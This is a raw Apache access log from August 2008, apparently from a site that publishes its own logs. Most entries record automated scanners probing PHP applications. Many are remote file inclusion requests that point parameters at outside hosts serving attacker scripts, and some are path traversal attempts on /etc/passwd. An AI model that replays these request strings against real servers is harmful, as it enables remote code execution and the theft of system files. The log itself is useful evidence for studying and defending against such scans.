89.97.0.11 - - [01/Aug/2008:19:04:07 -0500] "GET /logs/access_log.1214438400/htmltonuke.php?filnavn=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
89.97.0.11 - - [01/Aug/2008:19:04:07 -0500] "GET /logs/access_log.1214438400/htmltonuke.php?filnavn=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
209.66.114.245 - - [01/Aug/2008:19:04:54 -0500] "GET /logs/access_log.1214092800 HTTP/1.0" 200 467725 "-""-"
202.190.203.220 - - [01/Aug/2008:19:08:10 -0500] "GET /logs/access_log.1214438400//appserv/errors.php?error=http://aaa-hack.fateback.com/id2.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
202.190.203.220 - - [01/Aug/2008:19:08:10 -0500] "GET //appserv/errors.php?error=http://aaa-hack.fateback.com/id2.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
202.190.203.220 - - [01/Aug/2008:19:08:11 -0500] "GET /logs//appserv/errors.php?error=http://aaa-hack.fateback.com/id2.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
85.214.32.233 - - [01/Aug/2008:19:10:51 -0500] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://ies-nigeria.com/hezid2.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
85.214.32.233 - - [01/Aug/2008:19:10:52 -0500] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://ies-nigeria.com/hezid2.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
80.67.24.32 - - [01/Aug/2008:19:14:57 -0500] "GET /logs//faqsupport/home.category.php?path%5Bdocroot%5D=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
80.67.24.32 - - [01/Aug/2008:19:14:57 -0500] "GET //faqsupport/home.category.php?path%5Bdocroot%5D=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
65.98.70.18 - - [01/Aug/2008:19:20:30 -0500] "GET /logs/access_log.1213315200//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.topyn.com/ips.txt?? HTTP/1.1" 404 378 "-""libwww-perl/5.811"
89.108.67.131 - - [01/Aug/2008:19:21:30 -0500] "GET /logs//errors.php?error=http://www.electrabike.fr/css/splash.me.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.812"
89.108.67.131 - - [01/Aug/2008:19:21:31 -0500] "GET //errors.php?error=http://www.electrabike.fr/css/splash.me.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.812"
70.85.201.66 - - [01/Aug/2008:19:24:08 -0500] "GET /logs/access_log.1214438400//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.811"
70.85.201.66 - - [01/Aug/2008:19:26:49 -0500] "GET /logs/access_log.1212883200//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.811"
131.107.65.41 - - [01/Aug/2008:19:32:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""MSR-ISRCCrawler"
74.6.18.231 - - [01/Aug/2008:19:33:38 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.231 - - [01/Aug/2008:19:33:39 -0500] "GET /logs/access_log.1173139200 HTTP/1.0" 200 149256 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.231 - - [01/Aug/2008:19:33:39 -0500] "GET /logs/access_log.1176163200 HTTP/1.0" 200 230264 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
194.85.89.114 - - [01/Aug/2008:19:34:15 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
194.85.89.114 - - [01/Aug/2008:19:34:15 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
131.107.65.41 - - [01/Aug/2008:19:34:16 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""MSR-ISRCCrawler"
89.97.0.11 - - [01/Aug/2008:19:35:27 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
89.97.0.11 - - [01/Aug/2008:19:35:27 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
74.6.18.231 - - [01/Aug/2008:19:35:32 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
204.10.38.130 - - [01/Aug/2008:19:38:15 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
204.10.38.130 - - [01/Aug/2008:19:38:16 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
209.172.33.53 - - [01/Aug/2008:19:38:44 -0500] "GET /logs/errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
209.172.33.53 - - [01/Aug/2008:19:38:44 -0500] "GET /errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
70.85.201.66 - - [01/Aug/2008:19:39:25 -0500] "GET /logs/access_log.1213142400//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 366 "-""libwww-perl/5.811"
85.17.162.125 - - [01/Aug/2008:19:42:50 -0500] "GET /logs/errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
85.17.162.125 - - [01/Aug/2008:19:42:50 -0500] "GET /errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
92.61.36.98 - - [01/Aug/2008:19:42:52 -0500] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/raid/docs/v6id.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
92.61.36.98 - - [01/Aug/2008:19:42:52 -0500] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/raid/docs/v6id.txt???? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
74.6.18.231 - - [01/Aug/2008:19:43:06 -0500] "GET /logs/access_log.1201651200 HTTP/1.0" 200 308239 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.199.244.42 - - [01/Aug/2008:19:43:57 -0500] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 341 "-""libwww-perl/5.811"
66.199.244.42 - - [01/Aug/2008:19:43:57 -0500] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
65.38.169.228 - - [01/Aug/2008:19:44:00 -0500] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.810"
65.38.169.228 - - [01/Aug/2008:19:44:01 -0500] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.romevillage.com/ids.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
208.78.40.58 - - [01/Aug/2008:19:47:08 -0500] "GET /logs/errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
208.78.40.58 - - [01/Aug/2008:19:47:08 -0500] "GET /logs/errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
208.78.40.58 - - [01/Aug/2008:19:47:08 -0500] "GET /errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
208.78.40.58 - - [01/Aug/2008:19:47:08 -0500] "GET /errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
208.78.40.58 - - [01/Aug/2008:19:47:19 -0500] "GET /logs/errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
208.78.40.58 - - [01/Aug/2008:19:47:19 -0500] "GET /errors.php?error=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.52.139.226 - - [01/Aug/2008:19:48:21 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
74.52.139.226 - - [01/Aug/2008:19:48:21 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
62.76.116.20 - - [01/Aug/2008:19:49:11 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
62.76.116.20 - - [01/Aug/2008:19:49:11 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
216.180.241.37 - - [01/Aug/2008:19:51:06 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
216.180.241.37 - - [01/Aug/2008:19:51:06 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
202.190.203.220 - - [01/Aug/2008:19:52:24 -0500] "GET /logs/access_log.1212883200//appserv/errors.php?error=http://aaa-hack.fateback.com/id2.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
62.76.116.20 - - [01/Aug/2008:19:53:48 -0500] "GET /logs/access_log.1214438400/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 382 "-""libwww-perl/5.810"
62.76.116.20 - - [01/Aug/2008:19:53:48 -0500] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
62.76.116.20 - - [01/Aug/2008:19:53:48 -0500] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 355 "-""libwww-perl/5.810"
62.76.116.20 - - [01/Aug/2008:19:55:34 -0500] "GET /logs/access_log.1212883200/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 382 "-""libwww-perl/5.810"
216.199.200.75 - - [01/Aug/2008:19:55:48 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.199.200.75/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
216.199.200.75 - - [01/Aug/2008:19:55:52 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.199.200.75/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
89.111.176.64 - - [01/Aug/2008:19:57:09 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
89.111.176.64 - - [01/Aug/2008:19:57:09 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
85.18.81.164 - - [01/Aug/2008:19:59:19 -0500] "GET /logs//main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
85.18.81.164 - - [01/Aug/2008:19:59:20 -0500] "GET //main.php?sayfa=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
70.85.201.66 - - [01/Aug/2008:19:59:55 -0500] "GET /logs/access_log.1214438400//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.811"
70.85.201.66 - - [01/Aug/2008:19:59:55 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.811"
70.85.201.66 - - [01/Aug/2008:20:00:00 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.811"
65.98.70.18 - - [01/Aug/2008:20:00:03 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.topyn.com/ips.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.811"
65.98.70.18 - - [01/Aug/2008:20:00:03 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.topyn.com/ips.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
85.18.81.164 - - [01/Aug/2008:20:04:26 -0500] "GET /logs//login.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
85.18.81.164 - - [01/Aug/2008:20:04:27 -0500] "GET //login.php?dir=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.22.89.194 - - [01/Aug/2008:20:07:02 -0500] "GET /logs/%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 463 "-""libwww-perl/5.812"
64.22.89.194 - - [01/Aug/2008:20:07:02 -0500] "GET /%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 458 "-""libwww-perl/5.812"
64.22.89.194 - - [01/Aug/2008:20:07:03 -0500] "GET /logs/%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 463 "-""libwww-perl/5.812"
64.22.89.194 - - [01/Aug/2008:20:07:03 -0500] "GET /%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 458 "-""libwww-perl/5.812"
64.22.89.194 - - [01/Aug/2008:20:07:03 -0500] "GET /logs/%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 463 "-""libwww-perl/5.812"
64.22.89.194 - - [01/Aug/2008:20:07:03 -0500] "GET /%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 458 "-""libwww-perl/5.812"
64.22.89.194 - - [01/Aug/2008:20:07:03 -0500] "GET /logs/%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 463 "-""libwww-perl/5.812"
64.22.89.194 - - [01/Aug/2008:20:07:04 -0500] "GET /%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 458 "-""libwww-perl/5.812"
85.159.91.143 - - [01/Aug/2008:20:07:09 -0500] "GET /logs/%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 463 "-""libwww-perl/5.79"
85.159.91.143 - - [01/Aug/2008:20:07:09 -0500] "GET /%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 458 "-""libwww-perl/5.79"
85.159.91.143 - - [01/Aug/2008:20:07:11 -0500] "GET /logs/%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 463 "-""libwww-perl/5.79"
85.159.91.143 - - [01/Aug/2008:20:07:11 -0500] "GET /%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 458 "-""libwww-perl/5.79"
69.90.47.14 - - [01/Aug/2008:20:07:13 -0500] "GET /logs/access_log.1214438400//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 404 357 "-""libwww-perl/5.79"
69.90.47.14 - - [01/Aug/2008:20:07:13 -0500] "GET //amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.79"
69.90.47.14 - - [01/Aug/2008:20:07:13 -0500] "GET /logs//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
72.232.71.106 - - [01/Aug/2008:20:07:17 -0500] "GET /logs/%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 463 "-""libwww-perl/5.811"
72.232.71.106 - - [01/Aug/2008:20:07:17 -0500] "GET /%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 458 "-""libwww-perl/5.811"
72.232.71.106 - - [01/Aug/2008:20:07:21 -0500] "GET /logs/%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 463 "-""libwww-perl/5.811"
72.232.71.106 - - [01/Aug/2008:20:07:21 -0500] "GET /logs/%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 463 "-""libwww-perl/5.811"
72.232.71.106 - - [01/Aug/2008:20:07:21 -0500] "GET /%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 458 "-""libwww-perl/5.811"
72.232.71.106 - - [01/Aug/2008:20:07:21 -0500] "GET /%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 458 "-""libwww-perl/5.811"
72.232.71.106 - - [01/Aug/2008:20:07:32 -0500] "GET /logs/%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 463 "-""libwww-perl/5.811"
72.232.71.106 - - [01/Aug/2008:20:07:32 -0500] "GET /%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 458 "-""libwww-perl/5.811"
72.232.71.106 - - [01/Aug/2008:20:07:33 -0500] "GET /logs/%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 463 "-""libwww-perl/5.811"
72.232.71.106 - - [01/Aug/2008:20:07:33 -0500] "GET /%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 458 "-""libwww-perl/5.811"
72.232.71.106 - - [01/Aug/2008:20:07:36 -0500] "GET /logs/%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 463 "-""libwww-perl/5.811"
72.232.71.106 - - [01/Aug/2008:20:07:36 -0500] "GET /%22Links%22+%22%7C%22+%22News%22+%22%7C%22+%22Contact+Us%22+%22%7C%22+%22About+us%22+%22%7C%22+%22Privacy%22+%22%7C%22+%22Terms%22+%22%7C%22+%22FAQ%22+%22%7C%22+%22Add+feedback%22+%22%7C%22+%22Invite+a+friend%22+%22%7C%22+%22Bookmark%22http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 458 "-""libwww-perl/5.811"
201.130.79.130 - - [01/Aug/2008:20:10:06 -0500] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/raid/docs/v6id.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
201.130.79.130 - - [01/Aug/2008:20:10:06 -0500] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.desperate-souls.com/raid/docs/v6id.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
190.47.109.27 - - [01/Aug/2008:20:13:28 -0500] "GET /logs/?sourcedir=http://www.adoradores.kit.net/alb?? HTTP/1.1" 200 93669 "-""libwww-perl/5.803"
204.11.233.78 - - [01/Aug/2008:20:13:34 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 319 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
204.11.233.78 - - [01/Aug/2008:20:13:37 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 314 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
190.47.109.27 - - [01/Aug/2008:20:13:37 -0500] "GET /logs/?sourcedir=http://www.adoradores.kit.net/php?? HTTP/1.1" 200 93669 "-""libwww-perl/5.803"
190.47.109.27 - - [01/Aug/2008:20:13:38 -0500] "GET /?sourcedir=http://www.adoradores.kit.net/alb?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
190.47.109.27 - - [01/Aug/2008:20:13:38 -0500] "GET /?sourcedir=http://www.adoradores.kit.net/php?? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
70.85.48.114 - - [01/Aug/2008:20:14:36 -0500] "GET /errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 294 "-""Avant Browser (http://www.avantbrowser.com)"
70.85.48.114 - - [01/Aug/2008:20:14:36 -0500] "GET /logs/errors.php?error=http://www.geocities.com/lisnaalia/test.txt??? HTTP/1.1" 404 299 "-""Avant Browser (http://www.avantbrowser.com)"
74.6.18.231 - - [01/Aug/2008:20:15:55 -0500] "GET /logs/access_log.1177113600 HTTP/1.0" 200 137217 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
